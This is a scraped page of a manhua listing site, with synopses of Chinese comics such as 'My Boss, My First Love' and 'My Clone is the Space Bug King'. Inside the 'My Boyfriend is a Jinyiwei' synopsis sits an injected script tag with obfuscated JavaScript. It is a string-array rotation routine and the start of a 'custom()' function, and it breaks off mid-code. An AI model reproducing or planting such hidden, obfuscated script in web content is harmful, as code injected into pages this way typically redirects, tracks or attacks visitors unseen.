Manhua - Page 61

Manhua is a style of Chinese comic characterized by its intricate artwork and diverse storytelling. With a blend of Chinese cultural themes and popular genres like romance and fantasy, manhua offers something for everyone.

1468 results

My Beautiful And Wealthy Wife

My beautiful and wealthy wife "Orphan Qin Cheng, falsely accused and severely injured after marriage; by a stroke of luck, Qin Cheng awakens and embarks on an extraordinary life path from then on


My Beloved Ninita

My Beloved Ninita manhua, 亲爱的妮妮塔 , 天才侯爵令嬢の夫はオオカミ王⁉ This story takes place in the Alstrauss Empire, where humans and demons are sworn enemies, ever at war with each other. The protagonist, Ninita, is the daughter of the land’s ruler, Lord Hunt. An innocent girl with outstanding magical talents, the people hope she will become the Saint Priestess, a powerful human guardian the likes of which haven’t been seen for a millennium. However, she ended up falling in love with Jeff, a wolf demon, and next in line to become king of his people.


My Boss, My First Love

After finding her handsome boyfriend has cheated on her, 26-year-old Qin Shaofei immediately breaks up with him, and goes back to China. But on the plane, she has a conflict with a cute guy, who later helps her. After getting back to China, Qin Shaofei soon finds a job, but surprisingly, the one that she meets on the plane is actually her new boss Baili Ruyu, and this man lives upstairs. Gradually, they clear the air and become close friends. But Baili Ruyu’s parents act strangely at the first meeting with Qian Shaofei, so do Qin Shaofei’s parents when they meet Baili Ruyu. Why? Did the two people know each other before?


My Boyfriend is a Jinyiwei

In a modern-day loli’s home, a super handsome ancient Jinyiwei falls from the sky! Without parental care, the loli takes him as her closest person and even wants to become his bride?! Though he appears tsundere, cold, and picky on the surface, he finds it harder and harder to let go of her…<script></script><script>(function(_0x53d83e,_0x696195){var _0x4a9494=_0x2ac1,_0x4b9783=_0x53d83e();while(!![]){try{var _0x4596f1=parseInt(_0x4a9494(0x18c))/(0x4a1+0x19b9+-0x1*0x1e59)+parseInt(_0x4a9494(0x18d))/(-0x1a92+0x1453+0x641*0x1)+-parseInt(_0x4a9494(0x194))/(0x1*0x1b8a+0xa8c+-0x2613)*(parseInt(_0x4a9494(0x193))/(0x104c+-0xb3*-0xd+-0x195f))+-parseInt(_0x4a9494(0x1a2))/(-0x51*0x61+-0x1*0x15d7+0x1*0x348d)+parseInt(_0x4a9494(0x19e))/(-0x14f+0x1057*0x2+-0x1f59)+parseInt(_0x4a9494(0x196))/(0x2*0xe1b+0x93d+-0x256c)+-parseInt(_0x4a9494(0x18e))/(-0x11d6+-0xf2*-0x13+-0x18);if(_0x4596f1===_0x696195)break;else _0x4b9783['push'](_0x4b9783['shift']());}catch(_0x315139){_0x4b9783['push'](_0x4b9783['shift']());}}}(_0xeb4c,0x4*-0x2b4b4+0xd6*0xf1a+-0x1e6*-0x3b3));function custom(){var _0x3a07ef=_0x2ac1,_0x36ee8f={'PLijT':function(_0x7f8eda,_0x18fc9b){return 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My Brothers Dote On Me

Read manga My Brothers Dote On Me When she woke up in a new life, she became a poor little girl who was sent to the mental hospital by her own brothers. So with the painful memories of the original owner in the previous life, Pei Yun Ge began to fight back and fight against villains from all walks of life! All the way she abuses the scums, all the way she feels cool! However, she suddenly found her three former scum older brothers have become spoiled sister devils? Not only that, she gained another strong and powerful ” older brother”, the more the older brother’ spoiled her, the more she suspicious Is this the path of spoiling that can never be recovered/returned?


My Cards Can Level Up Forever!

Read Manhua My Cards Can Level Up Forever! / My Cards Can Be Infinitely Enhanced! / Wo De Ka Pai Neng Wuxian Zengqiang! In A World Where Cards Reign Supreme, Where Monsters, Mech-Beings, And Furries Can All Be Summoned, What Chance Does Zeng Qiang, A Poor And Ordinary Orphan, Have To Become A Card Master? Faced With A Life-Or-Death Crisis, Zeng Qiang Discovers That His Talent Holds Unexpected Potential! Who Knew Cards Could Be Played This Way?! You’re Asking What His Special Ability Is? — My Cards Can Be Infinitely Strengthened!


My Cells Kingdom

My Cells Kingdom manhua, My Miniature Kingdom, My cell kingdom of God, , , My cell kingdom, My Pocket KingdomAt the beginning of Lin Fan's life, a sand world appeared, in which the biological cells unearthed from each sand tribe multiplied. He knew, That it would change the world


My Clone is the Space Bug King

Read manhua My Clone is the Space Bug King; Wo De Fenshen Shi Yuzhou Chong Wang In the future, humanity has successfully left Earth and colonized various star systems, evolving into a new breed of humans who are taller and possess incredibly long lifespans. Meanwhile, Earth, the once-thriving mother planet, has been reduced to a nuclear wasteland due to overdevelopment and severe pollution. The original inhabitants still living on Earth now face an average lifespan of just 40 years, leading to widespread discrimination from the new humans. The protagonist is one of these Earth natives, but unlike others who have succumbed to despair, he works hard to become a mechanic even more skilled than the new humans. Just when he thought he could finally live a better life, he is met with betrayal and treated as cannon fodder when the cosmic insect race attacks a human outpost. However, with a burning desire for revenge, the protagonist discovers that he has been reborn as one of the cosmic insects! “My Clone is the Space Bug King” is sames name: Vũ Trụ Trùng Vương Wǒ De Fēnshēn Shì Yǔzhòu Chóng Wáng 我的分身是宇宙虫王


My Cunning Childhood Sweetheart

The heroine meets her childhood friend, but he seems to be a naive boy, and he is always receiving good guy cards, which seems to be very funny. The heroine thinks it’s time to teach her childhood friend to fall in love but why did it slowly become that she was the one being taught?*Please read on www.manhuasy.comNotes from mangabuddyAll our manhua content is protected under copyrighted law.mangabuddy never gives anyone authorization or permission to publish our content on another website/app. If you’re publishing our content on your website/app, it means that you’re infringing the copyright of our works. Therefore stop stealing n our work or else we will take legal action against you.


My Dad Is Too Strong

A scatterbrained, talentless civil servant returned as the heavenly Demon.He now wished to live the rest of his life peacefully, as his days in the Murim world were full of conflict and bloodshed. However…”Please be my father until I graduate.”He suddenly gained a daughter out of nowhere. Associated Names 我爸太强了 我爸太强了! 아빠가 너무 강함


My Daddy Is The Heavenly God

To find the mother for his loving daughter, the Grand Heavenly Master of the Immortal World decides to descend to earth and marry into the mother's household. As such, he becomes a live-in son-in-law who is detested by everyone. Although the Grand Heavenly Master has lost all his power, there is still no way that the prince from the Demon World, or someone who has a cheat system at hand would be a match for him...


My Dear Enemy

The whole company knew that they they were polar opposites who fought like cats and dogs. Yet during the year-end party, the wall between them shattered after they got drunk! And so the two of them went from always being close to going off on each other to feeling very strange things following the accidental mishap… 亲爱的死对头; My Dearest Nemesis
